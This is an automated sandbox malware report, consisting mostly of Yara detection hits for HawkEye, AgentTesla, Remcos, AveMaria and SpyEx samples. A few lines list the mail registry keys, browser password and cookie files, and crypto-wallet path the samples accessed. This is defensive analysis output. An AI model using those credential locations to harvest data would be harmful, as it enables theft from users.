                    Source: Yara matchFile source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000030.00000000.890118500.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000000.890500670.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000000.892197284.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.898115835.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 41.2.4.exe.62cbd0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.415058.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.1.4.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 38.2.4.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.23c0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.415058.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.62cbd0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.415058.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.415058.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 38.2.4.exe.147b1458.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.23c0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.415058.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.4.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.4.exe.38d3258.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.798585509.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.939895279.00000000023C0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.797295676.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.943516760.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000001.801556734.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.940107209.0000000002522000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.804765191.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.932861331.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.940282871.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
                    Yara detected SpyEx stealerShow sources
                    Source: Yara matchFile source: 39.0.21.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.21.exe.14770000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.2.21.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.1.21.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.0.21.exe.400000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.1.21.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000027.00000002.930302567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000000.789916886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000000.785901828.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000000.791751960.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.796886573.0000000014770000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000000.787824676.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000001.793855505.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Yara detected Remcos RATShow sources
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.0.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.rem9090sta.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.remcos.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.745207581.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.701188305.000000000065A000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000000.713254568.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.932016894.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.715029583.0000000000757000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.709586712.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.746741703.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.935198741.000000000064A000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.714713917.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000000.730677212.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000000.740936585.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.681886689.0000000000454000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.746856576.0000000000497000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xxTzyGLZx5.exe PID: 7008, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rem9090sta.exe PID: 7136, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4200, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPED
                    Yara detected AveMaria stealerShow sources
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
                    Tries to steal Mail credentials (via file / registry access)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Contains functionality to steal Firefox passwords or cookiesShow sources
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\4_2_0040A047
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: \key3.db4_2_0040A047
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Crypto Currency WalletsShow sources
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Yara detected WebBrowserPassView password recovery toolShow sources
                    Source: Yara matchFile source: 40.1.5.exe.41ce65.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.388b065.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab7e0d.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.41ce65.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
